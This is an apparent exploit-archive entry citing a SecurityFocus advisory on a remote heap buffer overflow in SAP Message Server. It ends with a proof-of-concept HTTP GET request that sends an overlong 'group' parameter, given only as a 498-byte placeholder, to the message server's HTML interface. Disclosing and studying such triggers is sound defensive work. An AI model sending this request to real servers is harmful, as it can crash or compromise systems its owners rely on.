14 lines
No EOL
833 B
Text
14 lines
No EOL
833 B
Text
source: https://www.securityfocus.com/bid/24765/info
|
|
|
|
SAP Message Server is prone to a remote heap-based buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied data before copying it to an insufficiently sized buffer.
|
|
|
|
Remote attackers can exploit this issue to execute arbitrary code with SYSTEM-level privileges. Successful attacks will result in a complete compromise of affected computers. Failed attacks will likely result in denial-of-service conditions that disable all functionality of the application.
|
|
|
|
GET /msgserver/html/group?group=**498 bytes** HTTP/1.0
|
|
Accept: */*
|
|
Accept-Language: en-us
|
|
Pragma: no-cache
|
|
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET
|
|
CLR 1.1.4322; .NET CLR 2.0.50727)
|
|
Host: sapserver:8100
|
|
Proxy-Connection: Keep-Alive |